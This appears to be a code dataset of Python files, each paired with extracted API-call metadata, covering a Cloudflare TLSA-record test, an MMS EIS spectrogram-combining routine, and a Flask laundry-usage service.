[((676, 694), 'eulxml.catalog.generate_catalog', 'generate_catalog', ([], {}), '()\n', (692, 694), False, 'from eulxml.catalog import generate_catalog\n'), ((814, 852), 'os.path.exists', 'os.path.exists', (['eulxml.XMLCATALOG_FILE'], {}), '(eulxml.XMLCATALOG_FILE)\n', (828, 852), False, 'import os\n'), ((957, 975), 'eulxml.catalog.generate_catalog', 'generate_catalog', ([], {}), '()\n', (973, 975), False, 'from eulxml.catalog import generate_catalog\n'), ((1351, 1366), 'distutils.command.clean.clean.run', 'clean.run', (['self'], {}), '(self)\n', (1360, 1366), False, 'from distutils.command.clean import clean\n'), ((1624, 1642), 'distutils.command.build_py.build_py.run', 'build_py.run', (['self'], {}), '(self)\n', (1636, 1642), False, 'from distutils.command.build_py import build_py\n'), ((1810, 1825), 'distutils.command.sdist.sdist.run', 'sdist.run', (['self'], {}), '(self)\n', (1819, 1825), False, 'from distutils.command.sdist import sdist\n'), ((3501, 3516), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (3514, 3516), False, 'from setuptools import setup, find_packages\n'), ((1265, 1301), 'shutil.rmtree', 'shutil.rmtree', (['eulxml.XMLCATALOG_DIR'], {}), '(eulxml.XMLCATALOG_DIR)\n', (1278, 1301), False, 'import shutil\n')]
|
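The custom-command skeleton that the setup script above builds on, reduced to its minimum; the command name is hypothetical.

from distutils.core import Command

class MyStep(Command):
    """Hypothetical custom step, registered via cmdclass={'mystep': MyStep}."""
    user_options = []

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    def run(self):
        print("running custom build step")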
import pytest
import re
from pathlib import Path
from time import sleep
from alnitak import config
from alnitak.api import cloudflare
from alnitak.tests import setup
from alnitak import prog as Prog
from alnitak import exceptions as Except
@pytest.fixture(scope="module")
def cloudflare_api(request):
return Path(request.fspath.dirname) / 'cloudflare.api'
def api_file_exists(cloudflare_api):
if cloudflare_api.exists():
return True
return False
def get_domain(api_path):
with open(str(api_path), 'r') as file:
lines = file.read().splitlines()
domain = None
for l in lines:
m = re.match(r'\s*#.*domain:\s*(?P<domain>\S+)\s*$', l)
if m:
domain = m.group('domain')
return domain
def test_cloudflare(cloudflare_api):
if not api_file_exists(cloudflare_api):
pytest.skip("no cloudflare.api file")
# need the domain
domain = get_domain(cloudflare_api)
assert domain
s = setup.Init(keep=True)
s.create_cloudflare_config(cloudflare_api, domain)
prog = setup.create_state_obj(s, config=s.configC1)
# need this to log if create_state_obj set 'log=True', otherwise this will
# do nothing.
with prog.log:
retval = config.read(prog)
assert retval == Prog.RetVal.ok
t_a2 = setup.create_tlsa_obj('211', '53527', 'tcp', domain)
t_a1 = setup.create_tlsa_obj('311', '53527', 'tcp', domain)
assert len(prog.target_list) == 1
target = prog.target_list[0]
assert len(target.tlsa) == 2
assert t_a1 in target.tlsa
assert t_a2 in target.tlsa
tlsa1 = target.tlsa[0]
tlsa2 = target.tlsa[1]
api = target.api
assert api.domain == domain
assert len(api.email) > 0
assert len(api.key) > 0
hash211 = s.hash['a.com']['cert1'][211]
hash311 = s.hash['a.com']['cert1'][311]
cloudflare.api_publish(prog, api, tlsa1, hash211)
cloudflare.api_publish(prog, api, tlsa2, hash311)
# error encountered: Except.DNSProcessingError
# record is already up: Except.DNSSkipProcessing
sleep(3)
records211 = cloudflare.api_read(prog, api, tlsa1)
records311 = cloudflare.api_read(prog, api, tlsa2)
# error encountered: Except.DNSProcessingError
# record is not up: Except.DNSNotLive
assert len(records211) == 1
assert hash211 in records211
assert len(records311) == 1
assert hash311 in records311
id211 = records211[hash211]
id311 = records311[hash311]
sleep(3)
cloudflare.api_delete(prog, api, tlsa1, id211)
cloudflare.api_delete(prog, api, tlsa2, id311)
# error encountered: Except.DNSProcessingError
sleep(3)
with pytest.raises(Except.DNSNotLive) as ex:
cloudflare.api_read(prog, api, tlsa1)
with pytest.raises(Except.DNSNotLive) as ex:
cloudflare.api_read(prog, api, tlsa2)
|
[
"alnitak.tests.setup.Init",
"alnitak.api.cloudflare.api_delete",
"alnitak.api.cloudflare.api_publish",
"alnitak.tests.setup.create_tlsa_obj",
"alnitak.tests.setup.create_state_obj",
"pytest.fixture",
"re.match",
"pytest.skip",
"time.sleep",
"alnitak.config.read",
"pathlib.Path",
"pytest.raises",
"alnitak.api.cloudflare.api_read"
] |
[((245, 275), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (259, 275), False, 'import pytest\n'), ((975, 996), 'alnitak.tests.setup.Init', 'setup.Init', ([], {'keep': '(True)'}), '(keep=True)\n', (985, 996), False, 'from alnitak.tests import setup\n'), ((1064, 1108), 'alnitak.tests.setup.create_state_obj', 'setup.create_state_obj', (['s'], {'config': 's.configC1'}), '(s, config=s.configC1)\n', (1086, 1108), False, 'from alnitak.tests import setup\n'), ((316, 344), 'pathlib.Path', 'Path', (['request.fspath.dirname'], {}), '(request.fspath.dirname)\n', (320, 344), False, 'from pathlib import Path\n'), ((633, 687), 're.match', 're.match', (['"""\\\\s*#.*domain:\\\\s*(?P<domain>\\\\S+)\\\\s*$"""', 'l'], {}), "('\\\\s*#.*domain:\\\\s*(?P<domain>\\\\S+)\\\\s*$', l)\n", (641, 687), False, 'import re\n'), ((847, 884), 'pytest.skip', 'pytest.skip', (['"""no cloudflare.api file"""'], {}), "('no cloudflare.api file')\n", (858, 884), False, 'import pytest\n'), ((1244, 1261), 'alnitak.config.read', 'config.read', (['prog'], {}), '(prog)\n', (1255, 1261), False, 'from alnitak import config\n'), ((1318, 1370), 'alnitak.tests.setup.create_tlsa_obj', 'setup.create_tlsa_obj', (["'211'", "'53527'", "'tcp'", 'domain'], {}), "('211', '53527', 'tcp', domain)\n", (1339, 1370), False, 'from alnitak.tests import setup\n'), ((1386, 1438), 'alnitak.tests.setup.create_tlsa_obj', 'setup.create_tlsa_obj', (["'311'", "'53527'", "'tcp'", 'domain'], {}), "('311', '53527', 'tcp', domain)\n", (1407, 1438), False, 'from alnitak.tests import setup\n'), ((1925, 1974), 'alnitak.api.cloudflare.api_publish', 'cloudflare.api_publish', (['prog', 'api', 'tlsa1', 'hash211'], {}), '(prog, api, tlsa1, hash211)\n', (1947, 1974), False, 'from alnitak.api import cloudflare\n'), ((1983, 2032), 'alnitak.api.cloudflare.api_publish', 'cloudflare.api_publish', (['prog', 'api', 'tlsa2', 'hash311'], {}), '(prog, api, tlsa2, hash311)\n', (2005, 2032), False, 'from alnitak.api import cloudflare\n'), ((2154, 2162), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2159, 2162), False, 'from time import sleep\n'), ((2185, 2222), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa1'], {}), '(prog, api, tlsa1)\n', (2204, 2222), False, 'from alnitak.api import cloudflare\n'), ((2244, 2281), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa2'], {}), '(prog, api, tlsa2)\n', (2263, 2281), False, 'from alnitak.api import cloudflare\n'), ((2613, 2621), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2618, 2621), False, 'from time import sleep\n'), ((2631, 2677), 'alnitak.api.cloudflare.api_delete', 'cloudflare.api_delete', (['prog', 'api', 'tlsa1', 'id211'], {}), '(prog, api, tlsa1, id211)\n', (2652, 2677), False, 'from alnitak.api import cloudflare\n'), ((2686, 2732), 'alnitak.api.cloudflare.api_delete', 'cloudflare.api_delete', (['prog', 'api', 'tlsa2', 'id311'], {}), '(prog, api, tlsa2, id311)\n', (2707, 2732), False, 'from alnitak.api import cloudflare\n'), ((2797, 2805), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2802, 2805), False, 'from time import sleep\n'), ((2820, 2852), 'pytest.raises', 'pytest.raises', (['Except.DNSNotLive'], {}), '(Except.DNSNotLive)\n', (2833, 2852), False, 'import pytest\n'), ((2872, 2909), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa1'], {}), '(prog, api, tlsa1)\n', (2891, 2909), False, 'from alnitak.api import cloudflare\n'), ((2924, 2956), 'pytest.raises', 'pytest.raises', (['Except.DNSNotLive'], {}), '(Except.DNSNotLive)\n', (2937, 2956), False, 'import pytest\n'), ((2976, 3013), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa2'], {}), '(prog, api, tlsa2)\n', (2995, 3013), False, 'from alnitak.api import cloudflare\n')]
|
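The named-group parse from get_domain above, exercised on a literal line for clarity:

import re

m = re.match(r'\s*#.*domain:\s*(?P<domain>\S+)\s*$', '# domain: example.com')
assert m and m.group('domain') == 'example.com'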
import numpy as np
# use nanmean from bottleneck if it's installed, otherwise use the numpy one
# bottleneck nanmean is ~2.5x faster
try:
import bottleneck as bn
nanmean = bn.nanmean
except ImportError:
nanmean = np.nanmean
from pytplot import get_data, store_data, options
from ...utilities.tnames import tnames
def mms_eis_spec_combine_sc(
species='proton', data_units='flux', datatype='extof', data_rate='srvy',
level='l2', suffix='',
):
'''
Combines omni-directional energy spectrogram variable from EIS on multiple
MMS spacecraft.
Parameters
----------
datatype: str
'extof', 'electroenergy', or 'phxtof' (default: 'extof')
data_rate: str
instrument data rate, e.g., 'srvy' or 'brst' (default: 'srvy')
level: str
data level ['l1a','l1b','l2pre','l2' (default)]
data_units: str
desired units for data, e.g., 'flux' or 'cps' (default: 'flux')
suffix: str
suffix of the loaded data; useful for preserving original tplot var
species: str
species for calculation, e.g., proton, oxygen, alpha or electron
(default: 'proton')
Returns:
Name of tplot variables created.
'''
## Thoughts for extensions:
    ## - Ensure arguments passed to modules are lowercase
if data_units == 'flux':
units_label = 'Intensity\n[1/cm^2-sr-s-keV]'
elif data_units == 'cps':
units_label = 'CountRate\n[counts/s]'
elif data_units == 'counts':
units_label = 'Counts\n[counts]'
#assert type(datatype) is str
if not isinstance(species, list): species = [species]
if not isinstance(datatype, list): datatype = [datatype]
out_vars = []
for species_id in species:
for dtype in datatype:
# retrieve: omni variables of species to determine # of probes
_species = species_id
if dtype == 'electronenergy':
_species = 'electron'
eis_sc_check = tnames('mms*eis*' + data_rate + '*' + dtype+'*' + _species + '*' + data_units + '*omni'+ suffix)
# process multiple probes
probes = []
for name in eis_sc_check:
probes.append(name[3:4])
if len(probes) > 4:
probes = probes[:-2]
if len(probes) > 1:
probe_string = probes[0] + '-' + probes[-1]
else:
if probes:
probe_string = probes[0]
else:
print('No probes found from eis_sc_check tnames.')
return
allmms_prefix = 'mmsx_epd_eis_' + data_rate + '_' + level + '_' + dtype + '_'
# DETERMINE SPACECRAFT WITH SMALLEST NUMBER OF TIME STEPS TO USE
# AS A REFERENCE SPACECRAFT
omni_vars = tnames('mms?_epd_eis_'+data_rate+'_'+level+'_'+dtype+'_'+_species+'_'+data_units+'_omni'+suffix)
if not omni_vars:
            print('No EIS '+dtype+' data loaded!')
return
time_size = np.zeros(len(probes))
energy_size = np.zeros(len(probes))
# Retrieve probe's pitch angle dist for all 6 (omni) telescopes
for p, probe in enumerate(probes):
# note: return from get_data here is (times, data, v)
# according to https://github.com/MAVENSDC/PyTplot/blob/ec87591521e84bae8d81caccaf64fc2a5785186f/pytplot/get_data.py#L66
# note: there are also available 'spec_bins' values
#print(pytplot.data_quants[omni_vars[p]].coords)
#t, data, v = get_data(omni_vars[p])
omni_times, omni_data, omni_energies = get_data(omni_vars[p])
time_size[p] = len(omni_times)
energy_size[p] = len(omni_energies)
reftime_sc_loc = np.argmin(time_size)
ref_sc_time_size = int(min(time_size))
refenergy_sc_loc = np.argmin(energy_size)
ref_sc_energy_size = int(min(energy_size))
prefix = 'mms'+probes[reftime_sc_loc]+'_epd_eis_'+data_rate+'_'+level+'_'+dtype+'_'
# Retrieve specific probe's data based on minimum time/energy
# Note: I did not split these tuples as the namespace is reused, i.e., "_refprobe"
time_refprobe = get_data(omni_vars[reftime_sc_loc])
energy_refprobe = get_data(omni_vars[refenergy_sc_loc])
# time x energy x spacecraft
omni_spec_data = np.empty([len(time_refprobe[0]), len(energy_refprobe[2]), len(probes)])
omni_spec_data[:] = np.nan
# time x energy
omni_spec = np.empty([len(time_refprobe[0]), len(energy_refprobe[2])])
omni_spec[:] = np.nan
energy_data = np.zeros([len(energy_refprobe[2]), len(probes)])
common_energy = np.zeros(len(energy_refprobe[2]))
# Average omni flux over all spacecraft and define common energy grid
for pp in range(len(omni_vars)):
temp_data = get_data(omni_vars[pp])
energy_data[:,pp] = temp_data[2][0:len(common_energy)]
omni_spec_data[0:ref_sc_time_size,:,pp] = temp_data[1][0:ref_sc_time_size,0:len(common_energy)]
for ee in range(len(common_energy)):
common_energy[ee] = nanmean(energy_data[ee,:], axis=0)
# Average omni flux over all spacecraft
for tt in range(len(time_refprobe[0])):
for ee in range(len(energy_refprobe[2])):
omni_spec[tt,ee] = nanmean(omni_spec_data[tt,ee,:], axis=0)
# store new tplot variable
omni_spec[np.isnan(omni_spec)] = 0.
new_name = allmms_prefix+_species+'_'+data_units+'_omni'
store_data(new_name, data={'x':time_refprobe[0], 'y':omni_spec, 'v':energy_refprobe[2]})
options(new_name, 'ylog', True)
options(new_name, 'zlog', True)
options(new_name, 'spec', True)
options(new_name, 'Colormap', 'jet')
options(new_name, 'ztitle', units_label)
options(new_name, 'ytitle', ' \\ '.join(['mms'+probe_string, _species.upper(), 'Energy [keV]']))
out_vars.append(new_name)
# Spin-average the data
spin_nums = get_data(prefix+'spin'+suffix)
if spin_nums is None:
print('Error: Could not find EIS spin variable -- now ending procedure.')
return
# find where the spin starts
_, spin_starts = np.unique(spin_nums[1], return_index=True)
spin_sum_flux = np.zeros([len(spin_starts), len(omni_spec[0,:])])
current_start = 0
for spin_idx in range(len(spin_starts)):
spin_sum_flux[spin_idx,:] = nanmean(omni_spec[current_start:spin_starts[spin_idx],:], axis=0)
current_start = spin_starts[spin_idx] + 1
sp = '_spin'
new_name = allmms_prefix+_species+'_'+data_units+'_omni'+sp
store_data(new_name, data={'x':spin_nums[0][spin_starts], 'y':spin_sum_flux, 'v':energy_refprobe[2]})
options(new_name, 'spec', True)
options(new_name, 'zlog', True)
options(new_name, 'ylog', True)
options(new_name, 'spec', True)
out_vars.append(new_name)
return out_vars
|
[
"pytplot.store_data",
"numpy.argmin",
"pytplot.get_data",
"numpy.isnan",
"pytplot.options",
"numpy.unique"
] |
[((3932, 3952), 'numpy.argmin', 'np.argmin', (['time_size'], {}), '(time_size)\n', (3941, 3952), True, 'import numpy as np\n'), ((4035, 4057), 'numpy.argmin', 'np.argmin', (['energy_size'], {}), '(energy_size)\n', (4044, 4057), True, 'import numpy as np\n'), ((4408, 4443), 'pytplot.get_data', 'get_data', (['omni_vars[reftime_sc_loc]'], {}), '(omni_vars[reftime_sc_loc])\n', (4416, 4443), False, 'from pytplot import get_data, store_data, options\n'), ((4474, 4511), 'pytplot.get_data', 'get_data', (['omni_vars[refenergy_sc_loc]'], {}), '(omni_vars[refenergy_sc_loc])\n', (4482, 4511), False, 'from pytplot import get_data, store_data, options\n'), ((5873, 5968), 'pytplot.store_data', 'store_data', (['new_name'], {'data': "{'x': time_refprobe[0], 'y': omni_spec, 'v': energy_refprobe[2]}"}), "(new_name, data={'x': time_refprobe[0], 'y': omni_spec, 'v':\n energy_refprobe[2]})\n", (5883, 5968), False, 'from pytplot import get_data, store_data, options\n'), ((5974, 6005), 'pytplot.options', 'options', (['new_name', '"""ylog"""', '(True)'], {}), "(new_name, 'ylog', True)\n", (5981, 6005), False, 'from pytplot import get_data, store_data, options\n'), ((6018, 6049), 'pytplot.options', 'options', (['new_name', '"""zlog"""', '(True)'], {}), "(new_name, 'zlog', True)\n", (6025, 6049), False, 'from pytplot import get_data, store_data, options\n'), ((6062, 6093), 'pytplot.options', 'options', (['new_name', '"""spec"""', '(True)'], {}), "(new_name, 'spec', True)\n", (6069, 6093), False, 'from pytplot import get_data, store_data, options\n'), ((6106, 6142), 'pytplot.options', 'options', (['new_name', '"""Colormap"""', '"""jet"""'], {}), "(new_name, 'Colormap', 'jet')\n", (6113, 6142), False, 'from pytplot import get_data, store_data, options\n'), ((6155, 6195), 'pytplot.options', 'options', (['new_name', '"""ztitle"""', 'units_label'], {}), "(new_name, 'ztitle', units_label)\n", (6162, 6195), False, 'from pytplot import get_data, store_data, options\n'), ((6404, 6438), 'pytplot.get_data', 'get_data', (["(prefix + 'spin' + suffix)"], {}), "(prefix + 'spin' + suffix)\n", (6412, 6438), False, 'from pytplot import get_data, store_data, options\n'), ((6653, 6695), 'numpy.unique', 'np.unique', (['spin_nums[1]'], {'return_index': '(True)'}), '(spin_nums[1], return_index=True)\n', (6662, 6695), True, 'import numpy as np\n'), ((7136, 7244), 'pytplot.store_data', 'store_data', (['new_name'], {'data': "{'x': spin_nums[0][spin_starts], 'y':\n spin_sum_flux, 'v': energy_refprobe[2]}"}), "(new_name, data={'x': spin_nums[0][spin_starts], 'y':\n spin_sum_flux, 'v': energy_refprobe[2]})\n", (7146, 7244), False, 'from pytplot import get_data, store_data, options\n'), ((7250, 7281), 'pytplot.options', 'options', (['new_name', '"""spec"""', '(True)'], {}), "(new_name, 'spec', True)\n", (7257, 7281), False, 'from pytplot import get_data, store_data, options\n'), ((7294, 7325), 'pytplot.options', 'options', (['new_name', '"""zlog"""', '(True)'], {}), "(new_name, 'zlog', True)\n", (7301, 7325), False, 'from pytplot import get_data, store_data, options\n'), ((7338, 7369), 'pytplot.options', 'options', (['new_name', '"""ylog"""', '(True)'], {}), "(new_name, 'ylog', True)\n", (7345, 7369), False, 'from pytplot import get_data, store_data, options\n'), ((7382, 7413), 'pytplot.options', 'options', (['new_name', '"""spec"""', '(True)'], {}), "(new_name, 'spec', True)\n", (7389, 7413), False, 'from pytplot import get_data, store_data, options\n'), ((3780, 3802), 'pytplot.get_data', 'get_data', (['omni_vars[p]'], {}), '(omni_vars[p])\n', (3788, 3802), False, 'from pytplot import get_data, store_data, options\n'), ((5133, 5156), 'pytplot.get_data', 'get_data', (['omni_vars[pp]'], {}), '(omni_vars[pp])\n', (5141, 5156), False, 'from pytplot import get_data, store_data, options\n'), ((5766, 5785), 'numpy.isnan', 'np.isnan', (['omni_spec'], {}), '(omni_spec)\n', (5774, 5785), True, 'import numpy as np\n')]
|
import calendar
import datetime
from flask import g, jsonify, request
from pytz import timezone
from requests.exceptions import HTTPError
from sqlalchemy import Integer, cast, exists, func
from server import app, sqldb
from server.auth import auth
from server.base import cached_route
from server.models import LaundryPreference, LaundrySnapshot, User
from server.penndata import laundry
@app.route("/laundry/halls", methods=["GET"])
def all_halls():
try:
return jsonify({"halls": laundry.all_status()})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
@app.route("/laundry/rooms/<hall_ids>", methods=["GET"])
def get_rooms(hall_ids):
est = timezone("EST")
date = datetime.datetime.now(est)
halls = [int(x) for x in hall_ids.split(",")]
output = {"rooms": []}
for hall in halls:
hall_data = laundry.hall_status(hall)
hall_data["id"] = hall
hall_data["usage_data"] = usage_data(hall, date.year, date.month, date.day)
output["rooms"].append(hall_data)
return jsonify(output)
@app.route("/laundry/hall/<int:hall_id>", methods=["GET"])
def hall(hall_id):
try:
return jsonify(laundry.hall_status(hall_id))
except ValueError:
return jsonify({"error": "Invalid hall id passed to server."})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
@app.route("/laundry/hall/<int:hall_id>/<int:hall_id2>", methods=["GET"])
def two_halls(hall_id, hall_id2):
try:
to_ret = {"halls": [laundry.hall_status(hall_id), laundry.hall_status(hall_id2)]}
return jsonify(to_ret)
except ValueError:
return jsonify({"error": "Invalid hall id passed to server."})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
@app.route("/laundry/halls/ids", methods=["GET"])
def id_to_name():
try:
return jsonify({"halls": laundry.hall_id_list})
except HTTPError:
return jsonify({"error": "The laundry api is currently unavailable."})
def safe_division(a, b):
return round(a / float(b), 3) if b > 0 else 0
@app.route("/laundry/usage/<int:hall_no>")
def usage_shortcut(hall_no):
est = timezone("EST")
now = datetime.datetime.now(est)
return usage(hall_no, now.year, now.month, now.day)
def usage_data(hall_no, year, month, day):
# turn date info into a date object
# find start range by subtracting 30 days
now = datetime.date(year, month, day)
start = now - datetime.timedelta(days=30)
# get the current day of the week for today and tomorrow
# python dow is monday = 0, while sql dow is sunday = 0
dow = (now.weekday() + 1) % 7
tmw = (dow + 1) % 7
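    # Worked example (illustrative): for a Wednesday, now.weekday() == 2, so
    # dow == 3 -- matching sqlite's strftime('%w') where Sunday == 0 -- and
    # MySQL's DAYOFWEEK() value is dow + 1 == 4 (Sunday == 1).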
# some commands are different between mysql and sqlite
is_mysql = sqldb.engine.name == "mysql"
# get the laundry information for today based on the day
# of week (if today is tuesday, get all the tuesdays
# in the past 30 days), group them by time, and include
    # the first 3 hours of the next day (time <= 179 minutes)
data = (
sqldb.session.query(
LaundrySnapshot.date,
(
func.floor(LaundrySnapshot.time / 60).label("time")
if is_mysql
else cast(LaundrySnapshot.time / 60, Integer).label("time")
),
func.avg(LaundrySnapshot.washers).label("all_washers"),
func.avg(LaundrySnapshot.dryers).label("all_dryers"),
func.avg(LaundrySnapshot.total_washers).label("all_total_washers"),
func.avg(LaundrySnapshot.total_dryers).label("all_total_dryers"),
)
.filter(
(
(LaundrySnapshot.room == hall_no)
& (
(
func.dayofweek(LaundrySnapshot.date) == dow + 1
if is_mysql
else func.strftime("%w", LaundrySnapshot.date) == str(dow)
)
| (
(LaundrySnapshot.time <= 180 - 1)
& (
func.dayofweek(LaundrySnapshot.date) == tmw + 1
if is_mysql
else func.strftime("%w", LaundrySnapshot.date) == str(tmw)
)
)
)
& (LaundrySnapshot.date >= start)
)
)
.group_by(LaundrySnapshot.date, "time")
.order_by(LaundrySnapshot.date, "time")
.all()
)
data = [x._asdict() for x in data]
all_dryers = [int(x["all_total_dryers"]) for x in data]
all_washers = [int(x["all_total_washers"]) for x in data]
washer_points = {k: 0 for k in range(27)}
dryer_points = {k: 0 for k in range(27)}
washer_total = {k: 0 for k in range(27)}
dryer_total = {k: 0 for k in range(27)}
for x in data:
hour = int(x["time"])
# if the value is for tomorrow, add 24 hours
if x["date"].weekday() != now.weekday():
hour += 24
washer_points[hour] += int(x["all_washers"])
dryer_points[hour] += int(x["all_dryers"])
washer_total[hour] += 1
dryer_total[hour] += 1
dates = [x["date"] for x in data]
if not dates:
dates = [now]
return {
"hall_name": laundry.id_to_hall[hall_no],
"location": laundry.id_to_location[hall_no],
"day_of_week": calendar.day_name[now.weekday()],
"start_date": min(dates).strftime("%Y-%m-%d"),
"end_date": max(dates).strftime("%Y-%m-%d"),
"total_number_of_dryers": safe_division(sum(all_dryers), len(all_dryers)),
"total_number_of_washers": safe_division(sum(all_washers), len(all_washers)),
"washer_data": {x: safe_division(washer_points[x], washer_total[x]) for x in washer_points},
"dryer_data": {x: safe_division(dryer_points[x], dryer_total[x]) for x in dryer_points},
}
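# Illustrative shape of the usage_data() result (hall name and values are
# made up): {"hall_name": "...", "washer_data": {0: 2.0, ..., 26: 0.0}, ...}.
# Keys 0-23 are hours of the requested day; keys 24-26 cover the first three
# hours of the following day, which the query above includes via the
# LaundrySnapshot.time <= 180 - 1 clause.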
@app.route("/laundry/usage/<int:hall_no>/<int:year>-<int:month>-<int:day>", methods=["GET"])
def usage(hall_no, year, month, day):
def get_data():
return usage_data(hall_no, year, month, day)
td = datetime.timedelta(minutes=15)
return cached_route("laundry:usage:%s:%s-%s-%s" % (hall_no, year, month, day), td, get_data)
def save_data():
"""Retrieves current laundry info and saves it into the database."""
# get the number of minutes since midnight
est = timezone("EST")
now = datetime.datetime.now(est)
midnight = now.replace(hour=0, minute=0, second=0, microsecond=0)
date = now.date()
time = round((now - midnight).seconds / 60)
# check if we already have data for this minute
# if we do, skip
with app.app_context():
if sqldb.session.query(
exists().where((LaundrySnapshot.date == date) & (LaundrySnapshot.time == time))
).scalar():
return
# make a dict for hall name -> id
ids = {x["hall_name"]: x["id"] for x in laundry.hall_id_list}
data = laundry.all_status()
for name, room in data.items():
id = ids[name]
dryers = room["dryers"]["open"]
washers = room["washers"]["open"]
total_dryers = sum(
[room["dryers"][x] for x in ["open", "running", "offline", "out_of_order"]]
)
total_washers = sum(
[room["washers"][x] for x in ["open", "running", "offline", "out_of_order"]]
)
item = LaundrySnapshot(
date=date,
time=time,
room=id,
washers=washers,
dryers=dryers,
total_washers=total_washers,
total_dryers=total_dryers,
)
sqldb.session.add(item)
sqldb.session.commit()
@app.route("/laundry/preferences", methods=["POST"])
@auth(nullable=True)
def save_laundry_preferences():
try:
user = User.get_or_create()
except ValueError as e:
return jsonify({"success": False, "error": str(e)})
room_ids = request.form.get("rooms")
if not room_ids:
return jsonify({"success": False, "error": "No rooms specified."})
# delete old preferences for user
LaundryPreference.query.filter_by(user_id=user.id).delete()
room_ids = [int(x) for x in room_ids.split(",")]
account_id = g.account.id if g.account else None
for room_id in room_ids:
laundry_preference = LaundryPreference(user_id=user.id, account=account_id, room_id=room_id)
sqldb.session.add(laundry_preference)
sqldb.session.commit()
return jsonify({"success": True, "error": None})
@app.route("/laundry/preferences", methods=["GET"])
def get_laundry_preferences():
try:
user = User.get_or_create()
except ValueError:
return jsonify({"rooms": []})
preferences = LaundryPreference.query.filter_by(user_id=user.id)
room_ids = [x.room_id for x in preferences]
return jsonify({"rooms": room_ids})
@app.route("/laundry/status", methods=["GET"])
def get_laundry_status():
def get_data():
if laundry.check_is_working():
return {"is_working": True, "error_msg": None}
else:
error_msg = "Penn's laundry server is currently not updating. We hope this will be fixed shortly."
return {"is_working": False, "error_msg": error_msg}
td = datetime.timedelta(hours=1)
return cached_route("laundry:working", td, get_data)
|
[
"flask.request.form.get",
"server.models.LaundryPreference",
"server.penndata.laundry.all_status",
"flask.jsonify",
"server.penndata.laundry.check_is_working",
"server.sqldb.session.commit",
"server.auth.auth",
"server.penndata.laundry.hall_status",
"server.app.route",
"server.app.app_context",
"server.models.LaundryPreference.query.filter_by",
"datetime.timedelta",
"server.models.LaundrySnapshot",
"sqlalchemy.func.avg",
"datetime.datetime.now",
"sqlalchemy.exists",
"datetime.date",
"server.models.User.get_or_create",
"sqlalchemy.cast",
"server.base.cached_route",
"sqlalchemy.func.strftime",
"server.sqldb.session.add",
"sqlalchemy.func.floor",
"pytz.timezone",
"sqlalchemy.func.dayofweek"
] |
[((393, 437), 'server.app.route', 'app.route', (['"""/laundry/halls"""'], {'methods': "['GET']"}), "('/laundry/halls', methods=['GET'])\n", (402, 437), False, 'from server import app, sqldb\n'), ((624, 679), 'server.app.route', 'app.route', (['"""/laundry/rooms/<hall_ids>"""'], {'methods': "['GET']"}), "('/laundry/rooms/<hall_ids>', methods=['GET'])\n", (633, 679), False, 'from server import app, sqldb\n'), ((1102, 1159), 'server.app.route', 'app.route', (['"""/laundry/hall/<int:hall_id>"""'], {'methods': "['GET']"}), "('/laundry/hall/<int:hall_id>', methods=['GET'])\n", (1111, 1159), False, 'from server import app, sqldb\n'), ((1439, 1511), 'server.app.route', 'app.route', (['"""/laundry/hall/<int:hall_id>/<int:hall_id2>"""'], {'methods': "['GET']"}), "('/laundry/hall/<int:hall_id>/<int:hall_id2>', methods=['GET'])\n", (1448, 1511), False, 'from server import app, sqldb\n'), ((1874, 1922), 'server.app.route', 'app.route', (['"""/laundry/halls/ids"""'], {'methods': "['GET']"}), "('/laundry/halls/ids', methods=['GET'])\n", (1883, 1922), False, 'from server import app, sqldb\n'), ((2187, 2228), 'server.app.route', 'app.route', (['"""/laundry/usage/<int:hall_no>"""'], {}), "('/laundry/usage/<int:hall_no>')\n", (2196, 2228), False, 'from server import app, sqldb\n'), ((6001, 6096), 'server.app.route', 'app.route', (['"""/laundry/usage/<int:hall_no>/<int:year>-<int:month>-<int:day>"""'], {'methods': "['GET']"}), "('/laundry/usage/<int:hall_no>/<int:year>-<int:month>-<int:day>',\n methods=['GET'])\n", (6010, 6096), False, 'from server import app, sqldb\n'), ((7885, 7936), 'server.app.route', 'app.route', (['"""/laundry/preferences"""'], {'methods': "['POST']"}), "('/laundry/preferences', methods=['POST'])\n", (7894, 7936), False, 'from server import app, sqldb\n'), ((7938, 7957), 'server.auth.auth', 'auth', ([], {'nullable': '(True)'}), '(nullable=True)\n', (7942, 7957), False, 'from server.auth import auth\n'), ((8733, 8783), 'server.app.route', 'app.route', (['"""/laundry/preferences"""'], {'methods': "['GET']"}), "('/laundry/preferences', methods=['GET'])\n", (8742, 8783), False, 'from server import app, sqldb\n'), ((9082, 9127), 'server.app.route', 'app.route', (['"""/laundry/status"""'], {'methods': "['GET']"}), "('/laundry/status', methods=['GET'])\n", (9091, 9127), False, 'from server import app, sqldb\n'), ((715, 730), 'pytz.timezone', 'timezone', (['"""EST"""'], {}), "('EST')\n", (723, 730), False, 'from pytz import timezone\n'), ((742, 768), 'datetime.datetime.now', 'datetime.datetime.now', (['est'], {}), '(est)\n', (763, 768), False, 'import datetime\n'), ((1083, 1098), 'flask.jsonify', 'jsonify', (['output'], {}), '(output)\n', (1090, 1098), False, 'from flask import g, jsonify, request\n'), ((2268, 2283), 'pytz.timezone', 'timezone', (['"""EST"""'], {}), "('EST')\n", (2276, 2283), False, 'from pytz import timezone\n'), ((2294, 2320), 'datetime.datetime.now', 'datetime.datetime.now', (['est'], {}), '(est)\n', (2315, 2320), False, 'import datetime\n'), ((2518, 2549), 'datetime.date', 'datetime.date', (['year', 'month', 'day'], {}), '(year, month, day)\n', (2531, 2549), False, 'import datetime\n'), ((6214, 6244), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(15)'}), '(minutes=15)\n', (6232, 6244), False, 'import datetime\n'), ((6256, 6345), 'server.base.cached_route', 'cached_route', (["('laundry:usage:%s:%s-%s-%s' % 